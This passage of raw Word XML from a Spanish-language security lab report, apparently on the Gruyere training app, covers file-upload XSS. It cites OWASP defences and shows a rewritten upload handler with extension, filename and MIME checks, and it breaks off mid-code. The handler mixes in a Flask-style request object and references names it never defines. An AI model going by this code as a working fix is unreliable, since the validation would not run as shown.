      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="39541AF1" w14:textId="6A9A50E3" w:rsidR="00D33545" w:rsidRDefault="00D33545" w:rsidP="00D33545"/>
    <w:p w14:paraId="0FD87BAE" w14:textId="6B82FA80" w:rsidR="00D33545" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc127812509" w:history="1">
        <w:bookmarkStart w:id="67" w:name="_Toc128034178"/>
        <w:r w:rsidR="00D33545" w:rsidRPr="00610E00">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>File Upload XSS -&gt;</w:t>
        </w:r>
        <w:bookmarkEnd w:id="67"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1AD10400" w14:textId="5F934572" w:rsidR="004C17EA" w:rsidRDefault="004C17EA" w:rsidP="004C17EA"/>
    <w:p w14:paraId="288F11EE" w14:textId="75E8C703" w:rsidR="004C17EA" w:rsidRDefault="004C17EA" w:rsidP="004C17EA">
      <w:pPr>
        <w:ind w:left="705"/>
      </w:pPr>
      <w:r>
        <w:t>Tenemos varias</w:t>
      </w:r>
      <w:r w:rsidR="00F93572">
        <w:t xml:space="preserve"> formas de defenderse </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> según OWASP: </w:t>
      </w:r>
      <w:hyperlink r:id="rId308" w:history="1">
        <w:r w:rsidRPr="009C39EC">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDC1143" w14:textId="77777777" w:rsidR="004C17EA" w:rsidRPr="004C17EA" w:rsidRDefault="004C17EA" w:rsidP="004C17EA">
      <w:pPr>
        <w:ind w:left="705"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42CB6BEF" w14:textId="1B5C9AA9" w:rsidR="00D33545" w:rsidRDefault="00D33545" w:rsidP="00D33545">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="160E48B2" w14:textId="76B6648E" w:rsidR="00D33545" w:rsidRDefault="00D33545" w:rsidP="00D33545">
      <w:pPr>
        <w:ind w:left="705"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Hlk127956928"/>
      <w:r>
        <w:t>-Alojar el contenido en un dominio separado para que el script no tenga acceso a ningún contenido en su dominio. Es decir, en lugar de alojar el contenido de un usuario en ejemplo.com/nombre lo alojaríamos  en nombredeusuario.contenidousuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D07910F" w14:textId="4E3C91E6" w:rsidR="00D33545" w:rsidRDefault="00D33545" w:rsidP="00D33545">
      <w:pPr>
        <w:ind w:left="705"/>
      </w:pPr>
      <w:r>
        <w:t>-La aplicación debe filtrar y verificar el contenido de cualquier archivo que se cargue en el servidor. Los archivos deben escanearse y validarse minuciosamente antes de que estén disponible en el servidor. En caso de duda el archivo debe desecharse</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="04B602BE" w14:textId="3CB0470A" w:rsidR="00D33545" w:rsidRDefault="00D33545" w:rsidP="00D33545">
      <w:pPr>
        <w:ind w:left="705"/>
      </w:pPr>
      <w:r>
        <w:t>Para hacer esto modifico el código en el archivo grueyre.py</w:t>
      </w:r>
      <w:r w:rsidR="00DB1B48">
        <w:t>, el método _DoUpload2</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33764E96" w14:textId="3EAC4C29" w:rsidR="00D33545" w:rsidRDefault="001320AC" w:rsidP="00D33545">
      <w:pPr>
        <w:ind w:left="705"/>
      </w:pPr>
      <w:r w:rsidRPr="001320AC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CCAF0E4" wp14:editId="0E145FCF">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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00040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F29111" w14:textId="5EB420A6" w:rsidR="001320AC" w:rsidRDefault="001320AC" w:rsidP="00D33545">
      <w:pPr>
        <w:ind w:left="705"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F557AAA" w14:textId="1A280378" w:rsidR="001320AC" w:rsidRDefault="00E05F95" w:rsidP="00D33545">
      <w:pPr>
        <w:ind w:left="705"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Hlk128322078"/>
      <w:r>
        <w:t>Insertando este código:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D50506" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2E7CCB" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>import magic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28762168" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>from werkzeug.utils import secure_filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EC6C52" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470461F3" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>ALLOWED_EXTENSIONS = {'pdf', 'txt'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2E9128" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8351E5" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>def _DoUpload2(self, cookie, specials, params):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E99807" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    """Handles the /upload2 url: finish the upload and save the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077A3C95" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7772D327" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    Args:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1B73C3" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">      cookie: The cookie for this request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3734A53B" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">      specials: Other special values for this request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B39468" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">      params: Cgi parameters. (unused)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79516106" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42041E23" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    message = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33050167" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    url = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62139A57" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    directory = self._MakeUserDirectory(cookie[COOKIE_UID])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2514F837" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30830C14" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    if 'file' not in request.files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E733AA7" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        message = 'No se ha proporcionado ningún archivo.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159DD4EA" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        _Log(message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FDC9FB" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        return self._SendTemplateResponse('/upload2.gtl', specials, {'_message': message})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3A8C22" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1EC80D" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    file = request.files['file']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED4A13" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    if file.filename == '':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3FB34F" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        message = 'No se ha proporcionado ningún archivo.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CED9EE" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        _Log(message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8B5F99" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        return self._SendTemplateResponse('/upload2.gtl', specials, {'_message': message})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DF25C8" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB94225" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not allowed_file(file.filename):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2B7324" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        message = 'Tipo de archivo no permitido. Solo se permiten archivos PDF y TXT.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ECDC8F" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        _Log(message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D6216E" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        return self._SendTemplateResponse('/upload2.gtl', specials, {'_message': message})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCD5DBE" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D920144" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    filename = secure_filename(file.filename)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35474CDE" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    file.save(os.path.join(directory, filename))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5CBF36" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="002036F0" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # Check file type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE85121" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    mime_type = magic.from_file(os.path.join(directory, filename), mime=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617D44D1" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    if mime_type not in ALLOWED_MIME_TYPES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC5E875" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        os.remove(os.path.join(directory, filename))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C73A4DF" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        message = 'Tipo de archivo no permitido. Solo se permiten archivos PDF y TXT.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B88ED16" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        _Log(message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFC11F4" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">        return self._SendTemplateResponse('/upload2.gtl', specials, {'_message': message})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47497084" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="676E5E9A" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Clean text input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1030344E" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">    text_input = request.form.get('text_input', '').strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24535F91" w14:textId="77777777" w:rsidR="00E05F95" w:rsidRPr="00857F50" w:rsidRDefault="00E05F95" w:rsidP="00E05F95">
      <w:pPr>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
